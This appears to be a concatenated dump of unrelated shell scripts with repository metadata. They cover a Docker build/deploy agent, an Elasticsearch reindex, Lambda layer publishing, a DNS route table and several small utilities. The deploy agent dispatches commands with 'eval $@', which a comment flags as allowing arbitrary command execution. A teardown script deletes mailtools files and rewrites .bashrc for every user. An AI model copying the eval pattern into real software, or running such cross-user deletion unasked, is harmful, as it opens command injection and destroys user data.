# Build one service from git source; when it is the "real" deployable service
# the image is pushed and a [REMOTE_DEPLOY] marker line is emitted on stdout
# for the client to delegate deployment to $deployHost.
# Args: $1 serviceName, $2 projectUrl, $3 serviceBranch, $4 imageName,
#       $5 realService, $6 deployHost, $7 buildId, $8.. build command.
# Env:  COMPOSE_WORKSPACE (source checkouts), AGENT_PATH (agent home; holds
#       .build.cache.ini mapping serviceName=lastBuiltGitId).
# The final status line is "<service> BUILD_END:<status>" unless a remote
# deploy was delegated.
# build info start
serviceName=$1
projectUrl=$2
serviceBranch=$3
imageName=$4
realService=$5
deployHost=$6
buildId=$7
cmd=`echo ${@:8}`
echo -e "\033[33mbuild service [$serviceName] [$serviceBranch] start... \033[0m"
echo -e "\033[32mbuild info=======================================start \033[0m"
echo "|"
echo "| buildId: [$buildId]"
echo "| build realService:[$realService]"
echo "| clientIp: [$ip]"
echo "| deployHost: [$deployHost]"
echo "| ori cmd: [$@]"
echo "| serviceName: [$serviceName]"
echo "| imageName: [$imageName]"
echo "| projectUrl: [$projectUrl]"
echo "| serviceBranch: [$serviceBranch]"
echo "| cmd: [$cmd]"
# Repo directory name = last path component of the URL minus ".git".
projectRootName=`echo ${2##*/} | cut -d . -f 1`
echo "| projectGitName: [$projectRootName]|"
WORKSPACE=`echo $COMPOSE_WORKSPACE`
AGENT_PWD=`echo $AGENT_PATH`
echo "| env WORKSPACE : [$WORKSPACE]|"
echo "| env AGENT_HOME : [$AGENT_PWD]"
echo "|"
echo -e "\033[32mbuild info=======================================end \033[0m"
# build info end
# check start
if [ ! -d "$WORKSPACE" ];
then
echo -e "\033[31m 目录不存在,请添加COMPOSE_WORKSPACE环境变量指定代码空间: $WORKSPACE, 退出 \033[0m"
echo $serviceName" BUILD_END:1"
return 1
fi
if [ ! -d "$AGENT_PWD" ];
then
echo -e "\033[31m 目录不存在,请添加AGENT_PATH环境变量指定agent目录: $AGENT_PWD, 退出 \033[0m"
echo $serviceName" BUILD_END:1"
return 1
fi
cd $WORKSPACE
if [ ! -d $projectRootName ];
then
echo "项目不存在, 拉取项目: $projectUrl"
git clone $projectUrl
if [ $? -ne 0 ]; then
echo -e "\033[31mclone faild \033[0m"
echo $serviceName" BUILD_END:1"
return 1
fi
else
echo "项目已存在, 执行构建指令"
fi
# check end
# .build.cache.ini records the git id of the last successful build per service.
cd $AGENT_PWD
if [ ! -f ".build.cache.ini" ];
then
echo ".build.cache.ini 文件不存在,新建"
touch .build.cache.ini
else
echo ".build.cache.ini 文件已存在"
cat .build.cache.ini
fi
oldGitId=`cat .build.cache.ini | grep $serviceName | awk -F "=" '{print $2}'`
cd $WORKSPACE/$projectRootName
echo -e "\033[32mupdate [$serviceName] code:::branch [$serviceBranch]================================================start \033[0m"
git pull
git checkout $serviceBranch
git pull
newGitId=`git rev-parse --short=7 HEAD`
echo -e "\033[32mupdate [$serviceName] code:::branch [$serviceBranch]:::[$newGitId]====================================end \033[0m"
echo 'oldGitId: '$oldGitId', newGitId: '$newGitId
# Skip the build when HEAD is unchanged since the last successful build.
if [ "$newGitId" = "$oldGitId" ];
then
echo "gitId 一致,不需要重新构建,跳过..."
BUILD_STATUS=$?
else
#remove service old gitid
#echo "更新.build.cache.ini gitid"
#cd $AGENT_HOME
#sed -i "/^$1/d" .build.cache.ini
#add service new gitid at last line of .build.cache.ini
#echo "$1=$newGitId" >> .build.cache.ini
echo "执行指令: $cmd"
$cmd
BUILD_STATUS=$?
fi
if [ $BUILD_STATUS = 0 ];
then
#remove service old gitid
echo -e "\033[32m构建成功,更新gitid \033[0m"
cd $AGENT_PWD
sed -i "/^$serviceName/d" .build.cache.ini
#add service new gitid at last line of .build.cache.ini
echo "$serviceName=$newGitId" >> .build.cache.ini
## if is realService ,deploy service
if [ "$serviceName" = "$realService" ]; then
echo -e "\033[32mbuild is realService , deploy realService \033[0m"
## If deployHost differs from clientIp, this deploy must be delegated to the other machine.
# For remote deployment the image has to be pushed; push the new tag (not :latest) and let the remote host re-tag it as latest itself.
echo -e "\033[32mdocker push $imageName:$newGitId start\033[0m"
docker push $imageName:$newGitId
# How does the deploy instruction reach the other host?
# 1. It is returned to the client on stdout; the client fires an event keyed on the marker line.
# Marker fields: sourceIp:deployHost:service:imageName:newestTag
echo "[REMOTE_DEPLOY]:::$buildId:::$ip:::$deployHost:::$serviceName:::$imageName:::$newGitId"
echo "waiting deploy"
# For a remote deploy, stop this script here so its BUILD_END status line is not emitted.
return 1
else
echo -e "\033[33m[$serviceName] not is realService , skip deploy\033[0m"
fi
else
echo "构建失败, 跳过更新gitid"
fi
echo $1" BUILD_END:$BUILD_STATUS"
}
remoteDeployResp(){
# Deploy a pre-built image on THIS host, as delegated by a remote builder.
# Args: $1 buildId, $2 sourceIp (builder), $3 deployHost (this host),
#       $4 serviceName, $5 imageName, $6 imageTag.
# Every output line is suffixed with ":::[SOURCE_HOST]:::<sourceIp>" so the
# client can route the log back; the final line is
# "<service> [REMOTE_DEPLOY_END]:<status>:<buildId>:<sourceIp>".
buildId=$1
sourceIp=$2
deployHost=$3
serviceName=$4
imageName=$5
imageTag=$6
AGENT_PWD=`echo $AGENT_PATH`
# Marker identifying the originating (source) node, appended to each line.
sourceHostPre=":::[SOURCE_HOST]:::$sourceIp"
echo -e "\033[33mdeploy service [$serviceName] on [$deployHost] start... \033[0m$sourceHostPre"
echo -e "\033[32mdeploy info=======================================start \033[0m$sourceHostPre"
echo "|buildId: [$buildId]$sourceHostPre"
echo "|sourceIp: [$sourceIp]$sourceHostPre"
echo "|deployHost: [$deployHost]$sourceHostPre"
echo "|serviceName: [$serviceName]$sourceHostPre"
echo "|imageName: [$imageName]$sourceHostPre"
echo "|imageTag: [$imageTag]$sourceHostPre"
echo "|env AGENT_PATH: [$AGENT_PWD]$sourceHostPre"
echo -e "\033[32mdeploy info=======================================end \033[0m$sourceHostPre"
# pull image
echo -e "\033[32mpull image $imageName:$imageTag start \033[0m$sourceHostPre"
pullResp=$(docker pull $imageName:$imageTag 2>&1)
echo "$pullResp"|sed 's/$/&'"$sourceHostPre"'/g'
# to latest
echo -e "\033[32mtag to latest image\033[0m $sourceHostPre"
echo "[$imageName:$imageTag => $imageName:latest]$sourceHostPre"
## tag to latest images
docker tag $imageName:$imageTag $imageName:latest
images=$(docker images | grep $(docker images | grep $imageName | grep $imageTag | awk '{print$3}') 2>&1)
echo "$images"|sed 's/$/&'"$sourceHostPre"'/g'
## deploy
res=$(deployResp $serviceName $AGENT_PWD/yamlDir/$serviceName.yml 2>&1)
pss=$(docker ps | grep -w "$serviceName$" 2>&1)
# NOTE(review): "$?" below reflects the docker ps|grep just above, not
# deployResp — confirm whether deployResp's status was meant to be checked.
if [ $? -ne 0 ]; then
echo "$res" |sed 's/$/&'"$sourceHostPre"'/g'
echo -e "\033[31mdeploy faild \033[0m$sourceHostPre"
echo -e "\033[32m=========> run info\033[0m$sourceHostPre"
echo "$pss" | sed 's/$/&'"$sourceHostPre"'/g'
echo $serviceName" [REMOTE_DEPLOY_END]:1:$buildId:$sourceIp"
return 1
else
echo "$res" |sed 's/$/&'"$sourceHostPre"'/g'
echo -e "\033[32m=========> run info\033[0m$sourceHostPre"
echo "$pss" | sed 's/$/&'"$sourceHostPre"'/g'
echo -e "\033[32mdeploy service $serviceName successful\033[0m$sourceHostPre"
echo $serviceName" [REMOTE_DEPLOY_END]:0:$buildId:$sourceIp"
return 0
fi
}
# Dispatch: the first CLI argument selects one of the handler functions above;
# remaining arguments are passed through.
# NOTE(review): "eval $@" executes the raw command line — callers must be
# trusted, since crafted arguments amount to arbitrary command execution.
case $1 in
    "getServerInfoResp" | "build" | "deployResp" | "stopResp" | "restartResp" | "rmContainerResp" | "getYamlFile" |"getYamlFileResp" | "syncNetworkResp" | "remoteDeployResp") eval $@ ;;
    *) echo "invalid command $1" ;;
esac
| true
|
d4e857ae11e3db2e4024ec56ba409b410ece2aea
|
Shell
|
jcccookie/cs344
|
/program1/calc
|
UTF-8
| 275
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
#a=5
#b=2
#c=1
##a=$(( 3 * ( $b + $c ) ))
##d=$(( 3 / $b ))
##echo $a
##echo $d
#
#
#
#result=$(( ($a + ($b/2)*( ($a>0)*2-1 )) / $b ))
#echo $result
# Print every cross pair "<letter> + <digit>" from the two lists, skipping any
# pair whose members are equal.
a="a b c"
b="1 2 3"
for i in $a; do
	for j in $b; do
		# Bug fix: '-eq' is an integer comparison and errors out on letters
		# like "a"; use '=' for string equality.
		[ "$i" = "$j" ] && continue
		echo "$i + $j"
	done
done
| true
|
27e011e22fb6e2ec7817186463beaf0e745696d8
|
Shell
|
zangwanshun/osquery-wazuh-response
|
/ip-customblock.sh
|
UTF-8
| 792
| 3.5625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Custom OSSEC block / Easily modifiable for custom responses (touch a file, insert to db, etc).
# Expect: srcip
# Copyright (C) 2015-2020, Wazuh Inc.
# Author: Daniel B. Cid
# Last modified: Feb 16, 2013
# Active-response entry point: $1 add|delete, $2 user (unused), $3 source IP.
# "add" records the IP by touching /ipblock/<IP>; "delete" removes the marker.
ACTION=$1
USER=$2
IP=$3
LOCAL=`dirname $0`;
cd $LOCAL
cd ../
PWD=`pwd`
# Logging the call
echo "`date` $0 $1 $2 $3 $4 $5"
# IP Address must be provided
if [ "x${IP}" = "x" ]; then
   echo "$0: Missing argument <action> <user> (ip)"
   exit 1;
fi
# Custom block (touching a file inside /ipblock/IP)
if [ "x${ACTION}" = "xadd" ]; then
   if [ ! -d /ipblock ]; then
     mkdir /ipblock
   fi
   touch "/ipblock/${IP}"
elif [ "x${ACTION}" = "xdelete" ]; then
   rm -f "/ipblock/${IP}"
# Invalid action
else
   echo "$0: invalid action: ${ACTION}"
fi
# NOTE(review): the script exits 1 even on success — looks unintentional;
# confirm against the active-response framework's expectations.
exit 1;
| true
|
2b84792842be72453666ab38cab8a3d8c514a52c
|
Shell
|
sumanjs/suman
|
/dev-scripts/checkout-new-feature-branch.sh
|
UTF-8
| 318
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Create a fresh feature branch (feature_<user>_<millis>) off an up-to-date
# dev branch and push it to origin with upstream tracking enabled.
set -e;
git fetch origin
git checkout dev
git merge origin/dev
# Millisecond timestamp (via node) makes the branch name unique per run.
time_millis=$(node -e 'console.log(Date.now())');
NEW_FEATURE_BRANCH="feature_${USER}_${time_millis}"
git checkout -b "${NEW_FEATURE_BRANCH}"
git push -u origin HEAD # makes sure git is tracking this branch on the primary remote
| true
|
93d9cdd74b862d2a4bd2c85749a6a1a17686eda0
|
Shell
|
lumeng/repogit-mengapps
|
/file_system/warn-about-low-disk-space.sh
|
UTF-8
| 623
| 3.453125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Warn (via 'say' and a stdout log line) for every locally mounted filesystem
# with 5 GB or less available.  NOTE: relies on 'df -lg' column layout and
# the 'say' command, both macOS-specific.
df -lg | grep -vE '^Filesystem' | grep -vE '/private/var/vm$' | awk '{print $9 " " $4 }' | while read RESULT;
do
    # RESULT = "<mount point> <available GB>" (df columns 9 and 4).
    DISK_SPACE=$(echo $RESULT | awk '{ print $2}' | cut -d'%' -f1 )
    MOUNTING_PATH=$(echo $RESULT | awk '{ print $1 }' )
    if [[ $DISK_SPACE -le 5 ]]; then
        say "${DISK_SPACE}GB disk space left"
        # Bug fix: '-ne' is an integer comparison and always errors on a path
        # string; use string inequality to test for the root filesystem.
        if [[ $MOUNTING_PATH != "/" ]]; then
            say "at $MOUNTING_PATH!"
        fi
        echo "available disk space left: $(date -u +%Y-%m-%dT%H:%M:%SZ) $(hostname) ${DISK_SPACE}GB $MOUNTING_PATH !"
        # mail -s "Alert: ${DISK_SPACE}GB left at $MOUNTING_PATH" you@somewhere.com
    fi
done
## END
| true
|
dd4a923c87e87783dd9503f22d70f3c2f67a687c
|
Shell
|
hidepin/elkb-training
|
/reindex.sh
|
UTF-8
| 883
| 2.75
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Copy every Elasticsearch index whose name contains "metric" from
# $remote_host to $dest_host: create the destination index (1 shard,
# 0 replicas, best_compression), then run a remote _reindex.
remote_host="192.168.0.xx"
dest_host="192.168.0.yy"
# List all index names on the source, sorted.
for index in `curl -XGET "http://${remote_host}:9200/_cat/indices?h=index&s=index"`
do
# A quoted =~ right-hand side matches the literal substring "metric".
if [[ $index =~ "metric" ]]; then
curl -XPUT "http://${dest_host}:9200/${index}" -H 'Content-Type: application/json' -d'{
"settings": {
"number_of_shards": 1,
"number_of_replicas": 0,
"index.codec": "best_compression"
}
}'
curl -XPOST "http://${dest_host}:9200/_reindex?pretty" -H 'Content-Type: application/json' -d"
{
\"source\": {
\"remote\": {
\"host\": \"http://${remote_host}:9200\"
},
\"index\": \"${index}\"
},
\"dest\": {
\"index\": \"${index}\"
}
}
"
fi
done
| true
|
ad70c31701063ab264ae81f0997291bb4737ec43
|
Shell
|
HemilModi/Hemil_Modi
|
/Lab_3/Shell_script_7.sh
|
UTF-8
| 388
| 3.40625
| 3
|
[] |
no_license
|
# Repeatedly prompt for a string and expand recognized prefixes of "January";
# keeps looping until the user answers something other than 1 at the
# continue prompt.
count=1
while [ $count -eq 1 ]
do
echo "Enter a string related to january"
read a
# All accepted prefixes map to the same answer, so fold them into one arm.
case $a in
"Jan" | "Janu" | "Janua" | "January")
echo "January" ;;
*)
echo "Can not understand" ;;
esac
echo " Do you want to continue [1/0] : "
read b
if [ $b -eq 1 ]
then
count=1
else
count=0
fi
done
| true
|
828d64b3df44ef6014a47a5a7317de26741e26fb
|
Shell
|
aetherise/aetherise
|
/plot_signal3d.sh
|
UTF-8
| 994
| 3.359375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Render a 3D displacement-over-sidereal-time plot with gnuplot, localized
# (axis labels, decimal sign) for German vs. other locales.
# Usage: plot_signal3d.sh <datafile> [title] [output-file] [gnuplot-terminal]
if [[ $# -eq 0 ]]; then
	echo "$0 <filename> [title] [output-filename] [gnuplot-terminal]"
	exit 1
fi
title=$2
# Terminal selection: interactive qt window by default; SVG file when an
# output filename is given; a caller-supplied terminal overrides both.
if [ "$3" = "" ]; then
	term="qt 0"
else
	if [ "$4" = "" ]; then
		# fontsize 8pt and width 16.9cm on a 96dpi display
		# 10.67*72/96=8pt, 640/96*2.54=16.9cm
		term="svg font 'Sans,8' size 480,360 linewidth 0.5 background '#ffffff'; set output '$3'"
	else
		term="$4""; set output '$3'"
	fi
fi
if [[ $LANG == de* ]]
then
	xaxis="Sternzeit / h"
	yaxis="Azimut"
	zaxis="Verschiebung / λ"
	data_title="Daten"
	theorie_title="Theorie"
	decimalsign=","
else
	xaxis="Sidereal Time / h"
	yaxis="Azimuth"
	zaxis="Displacement / λ"
	data_title="Data"
	theorie_title="Theory"
	decimalsign="."
fi
# Pass everything to the gnuplot script via -e variables; trailing '-' keeps
# an interactive terminal open.
gnuplot -e "aether_data_file='$1'; aether_x_axis='$xaxis';aether_y_axis='$yaxis';aether_z_axis='$zaxis';aether_data_title='$data_title';aether_theorie_title='$theorie_title';aether_title='$title';set terminal $term; set decimalsign '$decimalsign'" signal3d.gnuplot -
| true
|
645ed70c337a91e73d60a36c8ea166c5fb468af2
|
Shell
|
yejiayu/canary-release
|
/hack/make-rules/docker.sh
|
UTF-8
| 519
| 3.46875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Build and/or push the project's Docker images, gated by the
# PRJ_DOCKER_BUILD / PRJ_DOCKER_PUSH environment variables.
# Exit on error. Append "|| true" if you expect an error.
set -o errexit
# Do not allow use of undefined vars. Use ${VAR:-} to use an undefined VAR
set -o nounset
# Fail a pipeline when any stage in it fails, not just the last one.
set -o pipefail
PRJ_ROOT=$(dirname "${BASH_SOURCE}")/../..
VERBOSE="${VERBOSE:-1}"
# init.sh presumably defines the docker:: helper functions — confirm.
source "${PRJ_ROOT}/hack/lib/init.sh"
# Opt-in gates: run a step only when its env var is set non-empty.
if [[ -n ${PRJ_DOCKER_BUILD-} ]]; then
    docker::build_images "$@"
fi
if [[ -n ${PRJ_DOCKER_PUSH-} ]]; then
    docker::push_images "$@"
fi
| true
|
c32acd34446bf11ce9f1b66df4974d7317a0cd8e
|
Shell
|
gpetters94/unixmailtools
|
/src/bin/sudo_teardown.sh
|
UTF-8
| 955
| 3.578125
| 4
|
[] |
no_license
|
#!/bin/bash
################################################################################
# File:		sudo_teardown.sh
# Path:		/usr/lib/mailtools/bin
# Language:	Bash
# Author:	Nathaniel Lao (nlao@terpmail.umd.edu)
#
# Teardown script that runs when mailtools in uninstalled from the system.
# Undoes the actions of user_setup.sh. Note that this destructively deletes all
# associated mailtools files from ALL users.
################################################################################
printf "Deleting mailtools files for all users\n"
# Remove argument completer code reference
# For every user home dir, rewrite .bashrc without the mailtools 'source'
# line, via a temp copy (grep cannot edit in place).
ls /home/ | xargs -I{} sh -c \
	"grep -v 'source /usr/lib/mailtools/bin/arg_complete_mailtools.sh' /home/{}/.bashrc > /home/{}/.bashrc.tmp; \
	cat /home/{}/.bashrc.tmp > /home/{}/.bashrc; \
	rm /home/{}/.bashrc.tmp"
# Remove all .mailtools directories from all users
rm -rvf /home/*/.mailtools
# Remove all symbolic links to $home/.mailtools/results
rm -rvf /home/*/mail/Mailtools
| true
|
3a70d2dbea397b7a74da90e88825b8500c2a8acf
|
Shell
|
ykitamura-mdsol/sumologic-lambda-extensions
|
/scripts/zip.sh
|
UTF-8
| 2,655
| 3.921875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -x
# Build the Sumo Logic Lambda extension for Linux, zip it in the layout Lambda
# layers expect (extensions/<binary>), then publish the zip as a public layer
# version in every listed AWS region.
# Assuming the zip.sh script is run from inside the scripts folder
# clean up of old target directories
cd ..
TARGET_DIR=target
if [ -d "$TARGET_DIR" ]; then
    echo "removing old ${TARGET_DIR}"
    rm -r ${TARGET_DIR};
fi
# Add GO packages to GOPATH. Not needed if you are using Go modules
# export GOPATH=${HOME}/GO:${PATH}:$(pwd)
echo "Creating an binary executable using the go build command for Linux Systems."
binary_name="sumologic-extension"
extension_bin_dir="${TARGET_DIR}/extensions"
extension_zip_dir="${TARGET_DIR}/zip"
mkdir -p ${extension_bin_dir}
mkdir -p ${extension_zip_dir}
# Cross-compile for Linux regardless of the build host's OS.
env GOOS=linux go build -o "${extension_bin_dir}/${binary_name}" "lambda-extensions/${binary_name}.go"
status=$?
if [ $status -ne 0 ]; then
    echo "Binary Generation Failed"
    exit 1
fi
chmod +x "${extension_bin_dir}/${binary_name}"
echo "Creating the Zip file binary in extension folder."
# Zip from inside target/ so the archive root is "extensions/".
cd ${TARGET_DIR}
zip -r "zip/${binary_name}.zip" extensions/
status=$?
if [ $status -ne 0 ]; then
    echo "Zip Generation Failed"
    exit 1
fi
cd ..
echo "Create lambda Layer from the new ZIP file in the provided AWS_PROFILE aws account."
if [[ -z "${AWS_PROFILE}" ]]; then
    export AWS_PROFILE="personal"
fi
AWS_REGIONS=(
	us-east-1
	us-east-2
	eu-north-1
	ap-south-1
	eu-west-3
	eu-west-2
	eu-south-1
	eu-west-1
	ap-northeast-2
	me-south-1
	ap-northeast-1
	sa-east-1
	ca-central-1
	ap-east-1
	ap-southeast-1
	ap-southeast-2
	eu-central-1
	us-west-1
	us-west-2
)
echo "Using AWS_PROFILE: ${AWS_PROFILE}"
# We have layer name as sumologic-extension. Please change name for local testing.
layer_name=${binary_name}
for region in "${AWS_REGIONS[@]}"; do
    layer_version=$(aws lambda publish-layer-version --layer-name ${layer_name} \
        --description "The SumoLogic Extension collects lambda logs and send it to Sumo Logic." \
        --license-info "Apache-2.0" --zip-file fileb://$(pwd)/${TARGET_DIR}/zip/${layer_name}.zip \
        --profile ${AWS_PROFILE} --region ${region} --output text --query Version )
    echo "Layer Arn: arn:aws:lambda:${region}:<accountId>:layer:${layer_name}:${layer_version} deployed to Region ${region}"
    echo "Setting public permissions for layer version: ${layer_version}"
# Make the freshly published layer version publicly consumable.
    aws lambda add-layer-version-permission --layer-name ${layer_name} --statement-id ${layer_name}-prod --version-number $layer_version --principal '*' --action lambda:GetLayerVersion --region ${region}
    # aws lambda add-layer-version-permission --layer-name ${layer_name} --statement-id ${layer_name}-dev --version-number ${layer_version} --principal '956882708938' --action lambda:GetLayerVersion --region ${region}
done
| true
|
082cb8af8d66aca2cbad872109919aa561337e24
|
Shell
|
legato-project/FinalSoftwareStack
|
/Samples/matmul-cuda-opencl/configure.sh
|
UTF-8
| 3,023
| 3.53125
| 4
|
[] |
no_license
|
#!/bin/bash -ex
# Entry point: with --pack, tar up the repo via git archive; with --wipe, run
# 'make wipe' in every ??-*/<subdir>; otherwise fall through to environment
# configuration below.
ROOTNAME=$(readlink -f $(dirname ${BASH_SOURCE[0]}))
if [ "X$1" == "X--pack" ];
then
    pushd $ROOTNAME
    git archive --format=tar.gz --output=ompss-ee.tar.gz --prefix=ompss-ee/ HEAD \
        || { echo >&2 "Option --pack requires git. Aborting"; exit 1; }
    popd
    exit 0
fi
if [ "X$1" == "X--wipe" ];
then
    pushd $ROOTNAME
# Two-level walk: each numbered top dir (??-*) contains example subdirs.
    for first in `ls -d ??-*/ | cut -f1 -d'/'`;
    do
        echo Entering... $first
        pushd $first
        for second in `ls -d */ | cut -f1 -d'/'`;
        do
            echo Entering... $second
            pushd $second
            make wipe
            popd
        done
        popd
    done
    popd
    exit 0
fi
echo Initial configuration...
# Machine profile: hard-coded here; BSC_MACHINE normally comes from the site.
export BSC_MACHINE=csic-stratix
# NOTE(review): BSC_MACHINE is forced just above, so this fallback can never
# fire as written — confirm whether the hard-coded export should be removed.
if [ "X$BSC_MACHINE" == "X" ]; then
    export BSC_MACHINE=default
fi
# Pull in the per-machine tool locations (OMPSS_HOME, MPI_HOME, etc.).
source $ROOTNAME/common-files/configure_$BSC_MACHINE
# Setting environment variables
export PATH=$OMPSS_HOME/bin:$PATH
export PATH=$DLB_HOME/bin:$PATH
export PATH=$EXTRAE_HOME/bin/:$PATH
export PATH=$PARAVER_HOME/bin:$PATH
export PATH=$TEMANEJO_HOME/bin:$PATH
export PATH=$MPI_HOME/bin:$PATH
export LD_LIBRARY_PATH=$MPI_LIB_DIR:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH=$MKL_LIB_DIR:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH=$ATLAS_LIB_DIR:$LD_LIBRARY_PATH
export LD_LIBRARY_PATH=$TEMANEJO_HOME/lib:$LD_LIBRARY_PATH
# Report whether a required file exists: prints "  <name> at <dir>" on
# success, "  WARNING: <warn>" otherwise (two leading spaces, as before).
check_tool() {
  local file=$1 name=$2 dir=$3 warn=$4
  if [ ! -f "$file" ]; then
    echo "  WARNING: $warn"
  else
    echo "  $name at $dir"
  fi
}

# Dump the given job-scheduler template when present, else print a warning.
show_sched() {
  local file=$1 warn=$2
  if [ ! -f "$file" ]; then
    echo "  WARNING: $warn"
  else
    cat "$file"
  fi
}

echo Basic configuration...
# Checking configuration, verbosing configuration
check_tool "$OMPSS_HOME/bin/mcc"         "Mercurium compiler" "$OMPSS_HOME/bin"    "Mercurium compiler not found!"
check_tool "$EXTRAE_HOME/bin/mpi2prv"    "Extrae library"     "$EXTRAE_HOME/bin"   "Extrae library not found!"
check_tool "$PARAVER_HOME/bin/wxparaver" "Paraver utility"    "$PARAVER_HOME/bin"  "Paraver utility not found!"
check_tool "$TEMANEJO_HOME/bin/Temanejo" "Temanejo utility"   "$TEMANEJO_HOME/bin" "Temanejo utility not found!"
echo Job schedule SMP configuration preface...
show_sched "$ROOTNAME/common-files/sched-job-smp" "Job schedule file for SMP is not configured for this machine!"
echo Job schedule MPI configuration preface...
show_sched "$ROOTNAME/common-files/sched-job-mpi" "Job schedule file for MPI is not configured for this machine!"
echo Aditional libraries...
check_tool "$MPI_LIB_DIR/libmpi.so"            "MPI library"   "$MPI_LIB_DIR"   "MPI library is not found, some tests will not be compiled!"
check_tool "$MKL_LIB_DIR/libmkl_sequential.so" "MKL library"   "$MKL_LIB_DIR"   "MKL library is not found, some tests will not be compiled!"
check_tool "$ATLAS_LIB_DIR/libatlas.a"         "ATLAS library" "$ATLAS_LIB_DIR" "ATLAS library is not found, some tests will not be compiled!"
| true
|
1f7c99d73de08f63bac1b48f1b5a89a2379f17ad
|
Shell
|
webee/rc
|
/scripts/mytmux.sh
|
UTF-8
| 403
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
# mytmux.sh -- attach to (or create) a named tmux session.
# Usage:
#   mytmux.sh .  <tmux args...>    pass the remaining args straight to tmux
#   mytmux.sh [name] [windows]     attach to session <name> (default "work"),
#                                  creating it with <windows> windows (default 4)
if [ "$1" == '.' ];then
  shift;
  # "$@" (not $*) so arguments containing spaces survive intact.
  exec tmux "$@"
  exit 0
fi
name=$1
n=$2
if [ "$name" == "" ];then
  name="work"
fi
# Session already exists: just attach.
if tmux ls|grep -q "^$name";then
  tmux attach-session -t "$name"
  exit 0
fi
if [ "$n" == "" ];then
  n=4
fi
# Create the session detached, then open the remaining n-1 windows.
tmux new-session -s "$name" -d
while [ "$n" -gt 1 ];do
  tmux neww -t "$name"
  n=$((n - 1))   # POSIX arithmetic instead of the deprecated $[...] form
done
tmux next-window -t "$name"
tmux attach-session -t "$name"
| true
|
56454e5f831731342641ec31b42e901cea1c529f
|
Shell
|
ycc0804/test
|
/route-dns
|
UTF-8
| 40,516
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/bash
# Adds routes to ICP DNS servers on the eight GWBN ("ChangKuan") DNS hosts.
# When you add a DNS server, these need to be added:
# IP_dns?=
# GW_dns?=
# get_my_ip() - add a match variable
# 'case `get_my_ip` in' part.
LOG=$(realpath "$0").log
MANUAL_MODE=1
# NXIP: not used in this chunk -- presumably sentinel addresses returned by
# NXDOMAIN-hijacking resolvers; TODO confirm against the rest of the file.
NXIP="127.126.125.124
124.14.10.117
124.14.8.196
"
# Pick the uplink interface for this host (note: dns[25] matches dns2 or
# dns5, dns[7] only dns7); anything else defaults to eth0.
case ${HOSTNAME} in
dns[7]) NIC="eno1";;
dns[4]) NIC="eth2";;
dns[25]) NIC="eth4";;
SH-RE-1.shpbs.com) NIC="em1";;
SH-RE-2.shpbs.com) NIC="em1";;
SH-RE-3.shpbs.com) NIC="em4";;
SH-RE-4.shpbs.com) NIC="em4";;
*) NIC="eth0"
esac
ADDRESS_LIST= # init first, used while add/del.
ADDRESS_LIST_ALL= # init first, contains all domainname or IP segments.
# 'ip' command must be exist. (command -v is the portable check, not `which`)
command -v ip >/dev/null 2>&1 || {
  echo "'ip' command not found, exit now"
  exit 1
}
# root only program
[ "$EUID" -ne 0 ] && {
  echo "Only for root"
  exit 1
}
# ip/gw pairs
# IP_<host>/GW_<host>: the service address configured on each DNS host and
# the next-hop gateway used when installing routes from that host.
IP_dns1="211.161.192.1"
GW_dns1="211.161.192.6"
IP_dns2="211.161.192.73"
GW_dns2="211.161.192.76"
IP_dns3="211.161.192.13"
GW_dns3="211.161.192.14"
IP_dns4="220.115.251.73"
GW_dns4="220.115.251.74"
IP_dns5="211.161.192.9"
GW_dns5="211.161.192.10"
IP_dns6="211.161.192.65"
GW_dns6="211.161.192.70"
IP_dns7="211.161.192.66"
GW_dns7="211.161.192.70"
IP_dns8="211.161.192.67"
GW_dns8="211.161.192.70"
IP_ns1="101.44.0.58"
GW_ns1="101.44.0.49"
IP_ns2="101.44.0.57"
GW_ns2="101.44.0.49"
IP_ns5="211.161.192.89"
GW_ns5="211.161.192.94"
IP_ns6="211.161.192.90"
GW_ns6="211.161.192.94"
IP_ns7="211.161.192.91"
GW_ns7="211.161.192.94"
IP_ns8="211.161.192.92"
GW_ns8="211.161.192.94"
IP_yd1="211.161.193.129"
GW_yd1="211.161.193.134"
IP_yd2="211.161.193.130"
GW_yd2="211.161.193.134"
IP_yd3="211.161.192.68"
GW_yd3="211.161.192.70"
IP_yd4="211.161.192.69"
GW_yd4="211.161.192.70"
IP_re1="211.161.250.41"
GW_re1="211.161.250.46"
IP_re2="211.161.250.42"
GW_re2="211.161.250.46"
IP_re3="211.161.192.36"
GW_re3="211.161.192.38"
IP_re4="211.161.192.35"
GW_re4="211.161.192.38"
# Dummy pair: arping_check() skips its ARP probe when MY_GW equals GW_test,
# so test runs never touch the network.
IP_test="1.1.1.1"
GW_test="1.1.1.2"
# Resolver that resolvename() queries via dig (@$MYDNS).
MYDNS=$IP_dns1
ADDRESS_LIST_ALL="
##### CDN provider #####
# TAG: DiLian CDN
# DNS域名后面跟的IP都是帝联给的,让我们把整个域转发到这些IP
# tlgslb.com
dns1.tlgslb.com
dns2.tlgslb.com
dns3.tlgslb.com
dns4.tlgslb.com
dns5.tlgslb.com
dns6.tlgslb.com
58.221.37.144
180.153.116.246
222.73.184.197
122.11.48.182
123.125.163.61
120.209.132.6
121.9.221.96
122.225.251.146
122.228.203.145
125.64.129.88
60.28.227.11
125.64.148.135
60.28.183.6
58.221.40.80
58.221.40.74
58.221.40.75
58.221.40.76
122.11.46.91
121.14.254.31
183.131.86.24
220.166.65.88
125.39.237.30
219.153.76.161
119.84.107.57
# TAG: Ucloud CDN
ns1.cdndo.com
ns2.cdndo.com
ns3.cdndo.com
ns4.cdndo.com
ns5.cdndo.com
# fastcdn.com
dns1.fastcdn.com
dns2.fastcdn.com
dns3.fastcdn.com
dns4.fastcdn.com
dns5.fastcdn.com
dns6.fastcdn.com
dns7.fastcdn.com
202.120.161.67
211.154.219.19
122.11.48.181
61.129.57.10
60.28.227.10
60.28.227.13
58.221.37.145
60.28.160.53
58.221.247.79
60.210.23.14
60.210.23.73
